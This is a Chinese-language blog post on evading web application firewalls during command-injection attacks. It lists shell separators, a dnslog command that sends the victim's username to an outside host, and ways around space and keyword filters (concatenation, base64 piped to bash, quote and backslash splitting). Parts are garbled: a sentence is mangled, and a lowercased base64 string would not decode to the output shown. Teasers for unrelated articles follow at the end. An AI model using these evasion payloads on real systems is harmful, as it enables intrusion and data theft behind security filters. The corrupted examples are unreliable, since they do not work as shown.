滲透測試中waf命令執行的繞過經驗技巧

2021-10-19 12:00:37 字數 1939 閱讀 2320

管道符 ;

順序執行,命令之間沒有邏輯關係

正常順序執行

&&邏輯與; 當命令1正確執行後,才會執行命令2。否則命令2不會執行

兩個命令都會執行

||邏輯或; 當命令1不正確執行後,命令2才會執行。否則命令2不會執行

mi會執行whom

其他特殊符號 符號

作用』單引號,在單引號中所有的特殊符號,如「$」和「`」(反引號)都無特殊含義

"雙引號,在雙引號中特殊符號都無特殊含義,但「$」、「`」(反引號)和「\」是例外,擁有「呼叫變數值」,「引用命令」和「轉義符」的特殊含義

`反引號:反引號括起來的內容是系統命令,在bash中先會執行它和()

$()和反引號作用相同,用來引用系統命令

#在shell指令碼中,#開頭的行代表注釋

$用於呼叫變數的值,如需要呼叫變數name的值時,需要用$name的方式得到

\轉義符,跟在\之後的特殊字元將失去特殊含義,變為普通字元

dnslog帶出命令

ping %username%.uvlmxy.dnslog.cn繞過空格限制

$

root@mon-one:~/tmp/tmp# cat tmp

onehh

nihao

root@mon-one:~/tmp/tmp# cat$tmp

onehh

nihao

重定向符<>

root@mon-one:~/tmp/tmp# cat<>tmp

onehh

nihao

root@mon-one:~/tmp/tmp# 

onehh

nihao

使用環境變數

command=$'\x20-al';ls$command
繞過命令黑名單

拼接

root@mon-one:~/tmp/tmp# cat tmp

onehh

nihao

root@mon-one:~/tmp/tmp# a=ca;b=t;c=tmp;$a$b $c

onehh

nihao

base64編碼

root@mon-one:~/tmp/tmp# `echo "y2f0ihrtca=="|base64 -d`

onehh

nihao

root@mon-one:~/tmp/tmp# echo "y2f0ihrtca=="|base64 -d|bash

onehh

nihao

單引號/雙引號

root@mon-one:~/tmp/tmp# ca''t tm""p

onehh

nihao

*反斜線*

root@mon-one:~/tmp/tmp# c\at tmp

onehh

nihao

$@繞過

who$@ami
如果覺得有用,感謝師傅給個贊支援下

SQL注入中的WAF繞過技術

論壇 法克論壇 目錄 1.大小寫繞過 2.簡單編碼繞過 3.注釋繞過 4.分隔重寫繞過 5.http引數汙染 hpp 6.使用邏輯運算子 or and繞過 7.比較操作符替換 8.同功能函式替換 9.盲注無需or和and 10.加括號 11.緩衝區溢位繞過 1.大小寫繞過 這個大家都很熟悉,對於一些...

滲透測試例項指南 命令執行

應用程式有時需要呼叫一些執行系統命令的函式,如在php中,使用system exec shell exec passthru popen proc popen等函式可以執行系統命令,當黑客能控制這些函式的引數時,就可以將惡意的系統命令拼接到正常命令中,從而造成了命令執行攻擊,這就是命令執行漏洞。sy...

滲透測試中SQLite的常用命令

sqlite 是乙個軟體庫,實現了自給自足的 無伺服器的 零配置的 事務性的 sql 資料庫引擎。sqlite 是在世界上最廣泛部署的 sql 資料庫引擎。sqlite 源 不受版權限制。建立資料夾 c sqlite,並在此資料夾下解壓上面兩個壓縮檔案,將得到 sqlite3.def sqlite3...